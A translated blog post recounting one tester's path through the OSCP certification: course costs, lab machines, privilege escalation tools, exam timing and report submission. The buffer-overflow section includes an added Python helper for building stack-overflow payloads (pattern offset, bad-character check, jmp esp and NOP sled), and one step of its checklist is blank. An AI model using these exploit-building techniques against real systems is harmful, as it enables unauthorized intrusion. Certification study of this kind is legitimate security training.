How I took the OSCP



My colleagues and I took the OSCP course and passed the exam. In this article I will describe in detail how the exam goes, what the pitfalls are, and whether the game is worth the candle at all.

How it all began


My colleague c4n said two years ago that we should take the OSCP, and I agreed, but, as often happens with good ideas, we put this good idea off.

A year later, our company got the opportunity to pay for useful training for employees (alas, my understanding of "useful" doesn't coincide with management's, and they still refuse to pay for my sommelier courses). GolovnyaD dragged us into the glorious undertaking of passing OSCP, saying that our excuses about being busy were so-so and that it was time to get going.

And we started.

What did we know about OSCP


We knew that OSCP consists, in fact, of 3 parts: the theoretical material (hereinafter I will call it the pdf), access to a laboratory with virtual machines (hereinafter I will call it the lab) and the exam.

The beginning of the way


As it turned out, access to the lab can be purchased for 30, 60 or 90 days, costing $999, $1199 and $1349 respectively. Since we did not want to devote all our free time to OSCP alone, and the difference between 30 days and 90 is only $350, we chose 90-day access.

On October 9, 2019, I paid for the course, expecting 3 months of fun; how wrong I was, I got 5 months of fun. And here's why.

Catch number one: you can't start training tomorrow. In my case, the nearest start date was October 20 (as they say on the forums, the average time from payment to start is 2 weeks).

Then, on October 9th, they sent a test package (Connectivity Pack) for connecting to the VPN. Judging by their tests, I had no problems with the VPN connection (as it turned out later, that was a so-called test; more on that below). Then they sent a link to their own Kali build (outwardly no different from the usual one), which is specially prepared for the course.

Course start


Formally, the course began at 3:00 AM on October 20, but the letter with the course materials arrived at 03:09 (I noticed this discrepancy only now, while writing the article). The letter with the course materials contains links to:

  • a 380-page pdf
  • video recordings for this pdf
  • VPN Connectivity Pack

And here we face catch number two: the download links are valid for 72 hours, and if you didn't manage to download in time, they will ask for an additional $100, after which they carefully say "make a backup" and insert a joke: “Remember the wise saying: there are two types of people. Those who backup and those who have yet to lose everything to a system crash.”
Also, all the forums recommend beginning the course with the tasks from the pdf. We all did just that.

Tasks from PDF


The tasks from the pdf need to be done in order to learn new tools and techniques, to remember how to use the tools and, possibly, to get 5 additional points on the exam. Surprisingly, the pdf does not say a word about Burp Suite or PowerShell Empire (they should have been added in the February update).

The pdf tells its story from the basics: we are taught to google, to use nc.exe (netcat), tcpdump, wireshark and other tools that relate more to systems engineering than to security. Only on page 113 of 380 do we get acquainted with nmap!

We are also taught to use tools such as OpenVAS, which cannot be used on the exam. The examples also often use meterpreter, which is likewise prohibited (it can be used on only one machine). In general, I still don't understand what caused this ban on meterpreter: it is clear that you can forbid using it for privilege escalation, but it would be convenient to keep the reverse shells going in several consoles.

It becomes interesting from page 148, where buffer overflows begin, and here I caught a problem with the VPN connection. As it turned out, my ISP cuts the size of packets, and the VPN in the lab is built over UDP, so my packets with buffer overflows simply did not get through and disappeared. The solution is simple - fix the config by adding the lines:

tun-mtu 1492
mssfix 1370

But it's a pity that the OSCP organizers don't check for this, because many people complain about it on their forum. I lost 5 hours and a lot of nerves on this (I reached the solution myself, and only then found a bunch of forum threads about it).

In order to write buffer overflows and do all sorts of experiments with Windows, they give us a virtual machine inside the lab, which is quite convenient. For the entire course, I did not install a single virtual machine of my own (once I tried to install Windows XP SP2, but did not find a working torrent).

In general, the buffer overflow tasks are very well written out (for both Windows and Linux); it would be cool if this were taught step by step like this in universities. The OSCP course explicitly says that bypassing DEP and ASLR is not part of the course.

Then they tell us how to prepare exploits and transfer files, and talk about privilege escalation, but we still get to play with all that enough in the lab, so that's okay.

Next comes the block on attacks on users (Client Side Attacks), where I caught a problem with the "specially prepared" Kali machine: it had a newer version of Java, and my Java applet did not work on the test machine. Another 5 hours of googling and solving the problem on my own and, of course, there is a thread on the forum about this)

In general, everything can be found on the forum; it is a very useful place if you are stuck in a dead end, but I understood this only at the end of the course.

Next come the attacks on the web - XSS, LFI, RFI, SQL injection and more. It is written clearly and well, and examples of poking around are given. They talk about sqlmap, which also cannot be used on the exam, but, of course, it is useful to know.

Then come attacks on passwords (brute force and obtaining hashes for Windows and Linux), which were too drawn out for me; I left some of the tasks for later (and did them already inside the lab). At the end there is a story about Metasploit and how to use it, in great detail, including writing your own module. There is also an example of hacking a fictitious company that uses many of the techniques described (it takes 34 pages).

In general, of the whole pdf about 100 pages are to the point (and there are a huge number of screenshots). It took me 2 weeks to read it and complete the tasks (but I was in no hurry).



When solving the lab, I decided not to use Metasploit and Meterpreter, because they cannot be used on the exam (only once).

The lab consists of approximately 60 virtual machines, divided into 4 subnets (the public network, the developers' network, the IT department network and the administrators' network). Initially, access is only to the public network (in fact, there is access to all networks; we just can't get a reverse shell from the machines in the non-public networks). In the lab (I write about the state before the February update), all the machines are quite old: the most recent Windows is Windows Server 2012 R2 (there is quite a lot of Windows XP), the Linux machines are Ubuntu 14 (Ubuntu 8 was also in the lab) and CentOS 7 (CentOS 5 was also encountered).

In theory, the whole lab should be solvable using vulnerabilities published before 2016, but I did not set myself such restrictions.

Lab (obtaining unprivileged access)


In general, the lab corresponds well to what was stated in the pdf. To obtain unprivileged access, you need to use various techniques (including attacks on clients), collect passwords from compromised machines and reuse them, run brute force and so on. Probably the most weakly represented topic is SQL injection and blind injection - I never came across them.

The algorithm for obtaining initial access was everywhere the same as in real life:

  1. enumeration of ports and services
  2. brute-forcing directories on the web
  3. identifying products and versions
  4. searching for and modifying exploits

A couple of machines require writing your own exploit black-box, but nothing complicated - LFI / RFI. Most of all, I was glad that there are almost no machines of the CTF category, where there is a picture inside which another picture is hidden, inside which a zip archive is hidden, and so on.

Laba (privilege escalation)


For me it was the most interesting part and it took most of my time (at first).

Windows


For Windows machines, I used these sets of exploits.

But on some Windows machines all the "kernel" vulnerabilities were deliberately patched and I had to figure out how to escalate. There are machines for every taste: services, startup items, scheduled tasks, installed software. Installed software is, of course, a big giveaway, because it is obvious that the machines are prepared, and if only one application is installed on the system, then you can escalate through it.

Linux


For Linux, of course, you can always use kernel vulnerabilities; everyone's beloved Dirty COW works on half the machines. I used this version: although it causes almost all the machines in the lab to hang, it successfully creates a user with ssh access.

But almost everywhere you can escalate through configuration vulnerabilities; LinEnum helps here, and, for the lazy, linux-smart-enumeration.

In general, it is not worth abusing kernel vulnerabilities in the lab; if you want to prepare for the exam, it is better to use configuration vulnerabilities, because all the machines on the exam will have fresh kernels and installed updates (at least that's what I got).

Post-exploitation in the lab


I left part of the post-exploitation for later, but after collecting all the passwords and looking through all the databases, configuration files and logs, you can easily get access to many machines (especially in the non-public networks).

Many machines are broken in a chain; it is important to understand this, especially for attacks on clients: if the machine is called mail, then maybe someone connects to it with a mail client, and if HELPDESK, then go look at the open tickets.

The big four


There are 4 machines in the lab that are considered the hardest, and some recommend leaving them for the end; these are Pain, Sufferance, Gh0st and Humble. I knew about them from the very beginning, but I did not specifically avoid them or seek them out. By the time I decided to return to them, I had already broken two of the four.

My impression of them:

  • Pain is a cool machine, complicated both in getting the initial shell and in privilege escalation.
  • Sufferance - a complex initial access, in several stages; I got something similar on the exam. Simple escalation.
  • Gh0st - the beginning and the initial access were like CTF machines, but one of the most beautiful privilege escalations in the entire lab.
  • Humble - arguably the most complex initial access in the lab, but a simple escalation.

In general, these are cool machines, and I'm almost sure that if you broke them in your lab, then you will pass the exam without any problems; I spent longer breaking Humble than I did on the exam.

My top would include:

  • Sherlock - proof is obtained in a couple of minutes, but you can sit for a long time trying to get a reverse shell.
  • beta - a very realistic machine, both in obtaining initial access and in escalation (restricted bash).

Lab results


In general, the lab made a good impression; I broke all the machines that I took on (about 45 machines).

In general, I remembered a lot of things that are not used often.

Exam preparation


A few days before the end of my lab access, I decided it was time to sign up for the exam. Here I was wrong; it is better to do this in advance. The nearest date on a day off was only a month later, on February 23 (and then at 9 a.m.).

Conclusion, and catch number three: if you want to take the exam at a convenient time, sign up for a weekend slot in advance.

I also started writing the lab report (you need to describe 10 machines if you want to get 5 extra points); the standard report example is too fancy, so I used this one. For the detailed descriptions, I chose either interesting machines or cases where you immediately get root.

I needed to take 10-15 additional screenshots, so I recommend still having lab access while writing this report.

Exam preparation. Training. Binary exploitation


One of the components of the exam is writing a buffer overflow exploit; it is worth 25 points, and without knowing how to do it quickly and well, going to the exam doesn't make much sense, so it is worth getting your hand in.

Good people have already put together a set of software to practice on.

I solved about 7 of them, and while I spent 2 hours on the first, I solved the seventh in 20 minutes, essentially limited only by the speed of writing code and typing commands. The algorithm that did not fail me:

  1. fuzzing: crash the service with a string of A's (on the exam this step will already be done for us)
  2. looking for the offset, as usual via pattern_create.rb and pattern_offset.rb
  3. checking the length: as usual, change the A's to B's in the right place, and after the B's insert a lot of C's to see the possible size of the payload without jumping into our buffer
  4. bad characters (\x00 is a bad character in 99% of cases)
  5. “jmp esp” address
  6. ,
  7. NOP sled (20 bytes of \x90)
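As an added example (not code from the original post), here is a Python sketch of steps 2, 4 and 5-7 of that algorithm: a pattern generator and offset lookup equivalent to pattern_create.rb / pattern_offset.rb, a bad-character comparison against a debugger dump, and a payload builder that enforces the length measured in step 3. The EIP value, the jmp esp address and the byte dumps used with it are constructed, not taken from any real target.

```python
import string
import struct

# Added example, not code from the original post: helpers for the
# buffer-overflow workflow described above. No real target is involved;
# every input fed to these functions is constructed for illustration.


def cyclic_pattern(length: int) -> bytes:
    """Step 2 helper: generate the non-repeating pattern that
    pattern_create.rb produces (Aa0Aa1...Aa9Ab0...), so that any 4-byte
    window maps back to a unique offset."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def find_offset(pattern: bytes, eip_value: int) -> int:
    """Step 2: the debugger shows EIP as a 32-bit value; pack it
    little-endian and look it up in the pattern (pattern_offset.rb)."""
    needle = struct.pack("<I", eip_value)
    idx = pattern.find(needle)
    if idx < 0:
        raise ValueError("EIP value not found in pattern")
    return idx


def find_bad_chars(sent: bytes, observed: bytes) -> list:
    """Step 4: compare the byte sequence we sent with the bytes the
    debugger shows on the stack. The first byte that is missing or
    altered is a bad char; everything after it is unreliable, so the
    caller removes it and repeats until the dump matches completely."""
    for i, byte in enumerate(sent):
        if i >= len(observed) or observed[i] != byte:
            return [byte]
    return []


def build_payload(offset: int, jmp_esp: int, shellcode: bytes,
                  max_len: int, nops: int = 20) -> bytes:
    """Steps 5-7: pad to the offset, overwrite EIP with the address of a
    'jmp esp' instruction (little-endian), then a NOP sled and the
    shellcode. Refuses to exceed the usable space measured in step 3."""
    payload = b"A" * offset + struct.pack("<I", jmp_esp)
    payload += b"\x90" * nops + shellcode
    if len(payload) > max_len:
        raise ValueError(f"payload is {len(payload)} bytes, limit {max_len}")
    return payload
```

The bad-character step is iterative on purpose: a single bad byte (for example \x0a) hides everything after it in the dump, so the function reports one byte per round rather than guessing the rest.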


In one of the exam writeups, I found this picture:



This picture shows which machines on hackthebox.eu resemble the machines from the exam (the Brainfuck machine doesn't resemble them at all; I recommend not training on it). To activate the machines, a paid subscription is required (10 bucks per month; don't forget to cancel it right away).

I spent 8 hours and solved 10 machines, alternating between Windows and Linux. And I decided that was enough for me, but, probably, here, as with buffer overflow, it is necessary to bring it to automatism. These machines are simpler than the machines on the exam, at least in terms of privilege escalation (some are copies of machines from the lab; I don't know who borrowed from whom).

Exam preparation. Training. Privilege escalation


You can train on the same machines from hackthebox.eu, but in general it will be enough to read writeups to understand what techniques there are; they contain examples of all the techniques you may need on the exam.

Exam preparation. Organizational part


To pass the exam you will need:

  1. international passport (your name and surname must be written in English)
  2. Webcam
  3. stable internet

It’s good to have extra:

  1. backup internet (I used mobile)
  2. a spare computer (I had a spare laptop next to me that was fully configured to take an exam)
  3. VM snapshot with Kali
  4. copy of VM with Kali (I put one copy on the hard drive, the second on the external hard drive)

Exam!


The exam is supervised (Proctored Exam), so it starts 15 minutes before the chosen time. You connect to a special web platform, share your screens, and in a text chat they start giving you tasks and questions:

  1. show your passport to the webcam
  2. show that nobody else is in the room
  3. give the results of the connection test script

Then I had a mishap: when I tried to copy the new Connectivity Pack to the virtual machine with Kali, it crashed. I was ready for this: I rolled back the virtual machine, copied the pack, launched it and started waiting for 9 in the morning.

I got access at 9:01.

I had a simple action plan:

  1. start service enumeration
  2. do the buffer overflow machine in 1 hour
  3. do the 10-point machine in 1 hour
  4. do the first 20-point machine in 2 hours
  5. do the second 20-point machine in 2 hours
  6. do the 25-point machine in 3 hours

As you can see from my plan, I expected the exam to take me 9 hours, but it didn't go according to plan from the very beginning :) I forgot to take into account an important slowing factor - writing down step by step everything that was done, with all the screenshots for the report.

The final result I got is the following:

  1. buffer overflow - 2.5 hours. I lost an hour because I did not notice a couple of bad characters; another 30 minutes for the report
  2. 10-point machine - 30 minutes: 10 minutes hacking, 20 minutes screenshots
  3. first 20-point machine - 2.5 hours: 1.5 hours hacking, 40 minutes screenshots and report, 20 minutes break
  4. second 20-point machine - 2 hours: 1.5 hours hacking, 30 minutes screenshots and report
  5. 25-point machine - 3.5 hours: 3 hours hacking (with two breaks), 30 minutes screenshots and report

In general, the exam is much more interesting than the lab; the vulnerabilities are all quite recent - 2018-2019. Privilege escalation is not everywhere via kernel vulnerabilities.

I spent the longest time on privilege escalation; all the unprivileged shells were obtained in 10-30 minutes.

The exam has many planted false paths that will not lead to success. While for the initial shell they are easily discarded (for example, a buffer overflow exploit for Windows XP SP2, although the service itself is running on Windows 10), during privilege escalation I got stuck on these false paths a couple of times. The main thing here is to tell yourself in time that this vector is worth abandoning and to choose a new one.

After 11 hours I finished the exam, having broken everything, and went to drink a couple of pints of beer (just a couple, since the next day I still had to write a formal, good-looking report).

Writing and sending a report


I took the template from the same repository as the lab template and filled it in over 4 hours.

Then the fun began with where and how to send it. First you need to encrypt it with 7z using a password; the password is not random, it is your ID in the system (5 digits; it is cracked in 0.3 seconds on a CPU). Then I searched for a long time for information on whether to put the lab report in the same archive or in another (answer: you need to put it in the same archive). Then I ran into the format for setting the password on a 7z archive: the -p flag, after which the password must be written without a space, i.e. something like -pPassword. In fact, all the steps are described in the guide; you just need to be able to find them.

The resulting archive must be uploaded to the site, get a link and send this link to a special mailbox! Why such difficulties in 2020 is a mystery to me.

After a couple of hours, you receive a reply letter saying: “We received your link, but did not verify that it contains a valid archive, that it decrypts and that it contains the necessary data. We will report the results of the exam within 10 working days.”

Summary


Exactly a week after the exam, on Sunday, March 1, I received a joyful letter saying that I had compiled the archive correctly:



After that I filled in the data for sending me a physical certificate and an OSCP certification card.

Who needs this certification?


I came up with the following list (sorted by how meaningful it is to obtain and how much this certificate is required):

  1. 4th-5th year students. For them, this is very cool practice.
  2. those who decided to move into security from related fields. Everything is described at a good level, with lots of examples; there is something to learn.
  3. employers. The certificate shows that a person knows something and can do something with his hands (in our vacancies we list it as a plus).
  4. people in the industry who want to refresh / test their knowledge
  5. experienced pentesters. Perhaps a nice piece of paper will make them more interesting to employers.

Further plans: to take OSWE (Offensive Security Web Expert). To me it is more interesting than OSCE (Offensive Security Certified Expert). And for those who are interested in reading about the various types of information security certifications, we wrote a separate article.
